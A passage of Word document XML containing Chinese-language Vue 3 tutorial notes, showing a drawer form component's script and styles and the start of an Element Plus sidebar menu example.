      </w:pPr>
      <w:r>
        <w:t>const open = () =&gt; showDrawer.value = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C8B91" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F3287F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35655C6A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const close = () =&gt; showDrawer.value = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9724E7" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6F75F5" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向父组件暴露的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580CE8C8" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>defineExpose({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B2404" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    open,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B15B63" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BA5B5" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0D8D5" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEB598A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6EE35" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667D3075" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8E419" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.formDrawer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F138CFE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14B422" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    width: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614F373E" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37073CE3" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB79181" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply flex flex-col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55CED1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EBF04F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.formDrawer .body{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706ECC01" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    flex: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595433D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    position: absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41652F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D396BD" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    left: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354AA242" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    right: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F9067" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    bottom: 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20936B67" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C19CC" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6769B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.formDrawer .actions{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10DCC" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    height: 50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B1DC1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    @apply mt-auto flex items-center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F15C5D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC7251" w14:textId="4071412A" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F86D60" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066A5FEF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDB7EF6" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F8A1FB" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613F20E1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C9A32F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C407055" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234725B4" w14:textId="77777777" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7E2E59" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C502DF" w14:textId="1FBB3059" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="708" w:name="_Toc159780138"/>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用弹框表单组件封装（二）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="708"/>
    </w:p>
    <w:p w14:paraId="4B0BE646" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C99E46F" w14:textId="76C50D52" w:rsidR="008D57F2" w:rsidRDefault="007D6422" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BAB61" w14:textId="1E186608" w:rsidR="008D57F2" w:rsidRDefault="007D6422" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:t>https://element-plus.org/zh-CN/component/menu.html#%E4%BE%A7%E6%A0%8F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A768B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235A8145" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;el-menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E0211" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        default-active="2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34422363" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        class="el-menu-vertical-demo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854654E" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        @open="handleOpen"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF4119" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        @close="handleClose"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3114CE" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F7E991" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-sub-menu index="1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC84B7F" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;template #title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75052FA9" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-icon&gt;&lt;location /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63024F24" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;span&gt;Navigator One&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA315E1" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B57F8" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-menu-item-group title="Group One"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA88E8" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-menu-item index="1-1"&gt;item one&lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022EE84" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-menu-item index="1-2"&gt;item two&lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67252DAB" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/el-menu-item-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855F2A8" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-menu-item-group title="Group Two"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344AE256" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-menu-item index="1-3"&gt;item three&lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9C5C6" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/el-menu-item-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885102D" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-sub-menu index="1-4"&gt;</w:t>
      </w:r>
    </w:p>
